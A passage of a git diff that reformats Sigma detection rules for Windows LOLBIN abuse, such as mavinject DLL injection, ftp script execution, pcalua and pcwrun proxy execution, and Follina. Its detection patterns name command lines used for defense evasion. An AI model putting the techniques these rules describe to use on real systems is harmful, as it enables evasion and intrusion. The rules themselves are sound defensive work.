Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: Extexport.exe - - Image|endswith: \Extexport.exe - - OriginalFileName: extexport.exe + - CommandLine|contains: Extexport.exe + - Image|endswith: \Extexport.exe + - OriginalFileName: extexport.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml index 2fae4015e..145f24de6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml @@ -19,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_lolbas: - - CommandLine|contains: extrac32.exe - - Image|endswith: \extrac32.exe - - OriginalFileName: extrac32.exe + - CommandLine|contains: extrac32.exe + - Image|endswith: \extrac32.exe + - OriginalFileName: extrac32.exe selection_archive: - CommandLine|contains: .cab + CommandLine|contains: .cab selection_options: - CommandLine|contains: + CommandLine|contains: - /C - /Y - ' \\\\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml index fc8cc8408..ab2628cea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - extrac32.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml index cda12fced..f7124782c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml @@ -1,9 +1,7 @@ title: Format.com FileSystem LOLBIN id: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60 status: test -description: Detects the execution of format.com with a suspicious filesystem selection - that could indicate a defense evasion activity in which format.com is used to - load malicious DLL files or other programs +description: Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs references: - https://twitter.com/0gtweet/status/1477925112561209344 - https://twitter.com/wdormann/status/1478011052130459653?s=20 @@ -21,9 +19,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \format.com - CommandLine|contains: '/fs:' + CommandLine|contains: '/fs:' filter: - CommandLine|contains: + CommandLine|contains: - /fs:FAT - /fs:exFAT - /fs:NTFS diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml index 7ec7e2b70..fe2278452 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml @@ -1,8 +1,7 @@ title: Use of FSharp Interpreters id: b96b2031-7c17-4473-afe7-a30ce714db29 status: test -description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL - bypass and is listed in Microsoft recommended block rules. +description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \fsianycpu.exe - - OriginalFileName: fsianycpu.exe - - Image|endswith: \fsi.exe - - OriginalFileName: fsi.exe + - Image|endswith: \fsianycpu.exe + - OriginalFileName: fsianycpu.exe + - Image|endswith: \fsi.exe + - OriginalFileName: fsi.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer. diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml index 77d7cdd2c..55c859044 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml @@ -1,8 +1,7 @@ title: LOLBIN Execution Of The FTP.EXE Binary id: 06b401f4-107c-4ff9-947f-9ec1e7649f1e status: test -description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag - and any child processes ran by ftp.exe +description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Ftp/ author: Victor Sergeev, oscd.community @@ -24,10 +23,10 @@ detection: selection_parent: ParentImage|endswith: \ftp.exe selection_ftp_img: - - Image|endswith: \ftp.exe - - OriginalFileName: ftp.exe + - Image|endswith: \ftp.exe + - OriginalFileName: ftp.exe selection_ftp_cli: - CommandLine|contains: + CommandLine|contains: - '-s:' - '/s:' condition: process_creation and (selection_parent or all of selection_ftp_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml index 8fe7672bc..834f36266 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml @@ -1,13 +1,12 @@ title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS id: 575dce0c-8139-4e30-9295-1ee75969f7fe related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 07aa184a-870d-413d-893a-157f317f6f58 - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government @@ -28,14 +27,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml index 807da8cc7..5cec36ce9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml @@ -1,8 +1,7 @@ title: Gpscript Execution id: 1e59c230-6670-45bf-83b0-98903780607e status: experimental -description: Detects the execution of the LOLBIN gpscript, which executes logon or - startup scripts configured in Group Policy +description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy references: - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \gpscript.exe - - OriginalFileName: GPSCRIPT.EXE + - Image|endswith: \gpscript.exe + - OriginalFileName: GPSCRIPT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /logon' - ' /startup' filter_main_svchost: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml index 226222aaa..0374cf6ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml @@ -1,8 +1,7 @@ title: Ie4uinit Lolbin Use From Invalid Path id: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc status: test -description: Detect use of ie4uinit.exe to execute commands from a specially prepared - ie4uinit.inf file from a directory other than the usual directories +description: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories references: - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ @@ -21,17 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational lolbin: - - Image|endswith: \ie4uinit.exe - - OriginalFileName: IE4UINIT.EXE + - Image|endswith: \ie4uinit.exe + - OriginalFileName: IE4UINIT.EXE filter_correct: CurrentDirectory: - c:\windows\system32\ - c:\windows\sysWOW64\ filter_missing: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (lolbin and not 1 of filter_*) falsepositives: - - ViberPC updater calls this binary with the following commandline "ie4uinit.exe - -ClearIconCache" + - ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache" level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml index 26968918e..6eb281d26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \ilasm.exe - - OriginalFileName: ilasm.exe + - Image|endswith: \ilasm.exe + - OriginalFileName: ilasm.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml index f9cb6f4cf..911bb6a37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml @@ -1,8 +1,7 @@ title: JSC Convert Javascript To Executable id: 52788a70-f1da-40dd-8fbd-73b5865d6568 status: test -description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript - code to .exe or .dll format +description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format references: - https://lolbas-project.github.io/lolbas/Binaries/Jsc/ author: frack113 @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \jsc.exe - CommandLine|contains: .js + CommandLine|contains: .js condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml index b4539da6e..78074137b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml @@ -1,9 +1,7 @@ title: Kavremover Dropped Binary LOLBIN Usage id: d047726b-c71c-4048-a99b-2e2f50dc107d status: test -description: Detects the execution of a signed binary dropped by Kaspersky Lab Products - Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands - and binaries. +description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. references: - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' run run-cmd ' + CommandLine|contains: ' run run-cmd ' filter: ParentImage|endswith: - - \kavremover.exe - - \cleanapi.exe + - \kavremover.exe # When launched from kavremover.exe + - \cleanapi.exe # When launched from KES installer condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml index 844ca870c..a4ef44ea1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml @@ -1,8 +1,7 @@ title: Launch-VsDevShell.PS1 Proxy Execution id: 45d3a03d-f441-458c-8883-df101a3bb146 status: test -description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script - to execute commands. +description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. references: - https://twitter.com/nas_bench/status/1535981653239255040 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_script: - CommandLine|contains: Launch-VsDevShell.ps1 + CommandLine|contains: Launch-VsDevShell.ps1 selection_flags: - CommandLine|contains: + CommandLine|contains: - 'VsWherePath ' - 'VsInstallationPath ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml index 23b3c23ff..5eabc0115 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml @@ -1,8 +1,7 @@ title: Potential Manage-bde.wsf Abuse To Proxy Execution id: c363385c-f75d-4753-a108-c1a8e28bdbda status: test -description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to - proxy execution +description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution references: - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/ - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wscript_img: - - Image|endswith: \wscript.exe - - OriginalFileName: wscript.exe + - Image|endswith: \wscript.exe + - OriginalFileName: wscript.exe selection_wscript_cli: - CommandLine|contains: manage-bde.wsf + CommandLine|contains: manage-bde.wsf selection_parent: ParentImage|endswith: - \cscript.exe @@ -35,8 +34,7 @@ detection: ParentCommandLine|contains: manage-bde.wsf selection_filter_cmd: Image|endswith: \cmd.exe - condition: process_creation and (all of selection_wscript_* or (selection_parent - and not selection_filter_cmd)) + condition: process_creation and (all of selection_wscript_* or (selection_parent and not selection_filter_cmd)) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml index 7f207e9b1..3fde71136 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml @@ -1,18 +1,17 @@ title: Mavinject Inject DLL Into Running Process id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 related: - - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 - type: obsoletes + - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 + type: obsoletes status: test -description: Detects process injection using the signed Windows tool "Mavinject" via - the "INJECTRUNNING" flag +description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet - https://github.com/SigmaHQ/sigma/issues/3742 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection author: frack113, Florian Roth @@ -32,9 +31,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' filter: - ParentImage: C:\Windows\System32\AppVClient.exe + ParentImage: C:\Windows\System32\AppVClient.exe # This parent is the expected process to launch "mavinject" condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml index 8ada4c4d8..27ab777df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml @@ -1,8 +1,7 @@ title: MpiExec Lolbin id: 729ce0ea-5d8f-4769-9762-e35de441586d status: test -description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN - from HPC pack that can be used to execute any other binary +description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1465058133303246867 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_binary: - - Image|endswith: \mpiexec.exe - - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 - - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 + - Image|endswith: \mpiexec.exe + - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 + - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /n 1 ' - ' -n 1 ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml index 9ed018ee5..d0c12c018 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - verb:sync - -source:RunCommand - -dest:runCommand diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml index 5488a576a..015d09727 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml @@ -1,9 +1,7 @@ title: Execute MSDT Via Answer File id: 9c8c7000-3065-44a8-a555-79bcba5d9955 status: test -description: Detects execution of "msdt.exe" using an answer file which is simulating - the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility - tab) +description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +20,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cli: Image|endswith: \msdt.exe - CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml + CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml selection_answer: - CommandLine|contains: + CommandLine|contains: - ' -af ' - ' /af ' filter: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml index 411590f4f..930152d14 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml @@ -1,8 +1,7 @@ title: Use of OpenConsole id: 814c95cc-8192-4378-a70a-f1aafd877af1 status: test -description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries - to bypass application Whitelisting +description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting references: - https://twitter.com/nas_bench/status/1537563834478645252 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: OpenConsole.exe - - Image|endswith: \OpenConsole.exe + - OriginalFileName: OpenConsole.exe + - Image|endswith: \OpenConsole.exe filter: - Image|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal + Image|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal # We exclude the default path for WindowsTerminal condition: process_creation and (selection and not filter) falsepositives: - Legitimate use by an administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml index a7246a29f..937ad0779 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \OpenWith.exe - CommandLine|contains: /c + CommandLine|contains: /c condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml index 39e7d1bd7..62cbf73f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml @@ -1,17 +1,14 @@ title: Use of Pcalua For Execution id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: Detects execition of commands and binaries from the context of The program - compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to - bypass application whitelisting. +description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic - Blue Detections, Endgame), oscd.community +author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2023/01/04 tags: @@ -27,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \pcalua.exe - CommandLine|contains: ' -a' + CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a "-a" condition: process_creation and selection falsepositives: - Legitimate use by a via a batch script or by an administrator. diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml index c501e912d..a26001405 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution By Program Compatibility Wizard id: b97cd4b1-30b8-4a9d-bd72-6293928d52bc status: test -description: Detect indirect command execution via Program Compatibility Assistant - pcwrun.exe +description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe references: - https://twitter.com/pabraeken/status/991335019833708544 - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/ @@ -30,8 +29,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts - Legit usage of scripts level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml index 0f32b0df3..e0a4da631 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml @@ -1,8 +1,7 @@ title: Execute Pcwrun.EXE To Leverage Follina id: 6004abd0-afa4-4557-ba90-49d172e0a299 status: test -description: Detects indirect command execution via Program Compatibility Assistant - "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nas_bench/status/1535663791362519040 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \pcwrun.exe - CommandLine|contains: ../ + CommandLine|contains: ../ condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml index c876c5875..9e9ec7b02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml @@ -1,8 +1,7 @@ title: Code Execution via Pcwutl.dll id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05 status: test -description: Detects launch of executable by calling the LaunchApplication function - from pcwutl.dll library. +description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. references: - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/ - https://twitter.com/harr0ey/status/989617817849876488 @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - pcwutl - LaunchApplication condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml index cf01ed10e..2c595d180 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml @@ -1,11 +1,10 @@ title: Execute Code with Pester.bat as Parent id: 18988e1b-9087-4f8a-82fe-0414dce49878 related: - - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e - type: similar + - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e + type: similar status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://twitter.com/_st0pp3r_/status/1560072680887525378 diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml index 8fae507cb..f7cdb7e39 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml @@ -1,8 +1,7 @@ title: Execute Code with Pester.bat id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md @@ -26,16 +25,16 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Pester - Get-Help cmd_execution: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - pester - ; get_help: - CommandLine|contains: + CommandLine|contains: - help - \? condition: process_creation and (powershell_module or (cmd_execution and get_help)) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml index 804110322..8b2476225 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml @@ -1,8 +1,7 @@ title: PrintBrm ZIP Creation of Extraction id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 status: test -description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to - create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. +description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. references: - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/ author: frack113 @@ -22,7 +21,7 @@ detection: Channel: 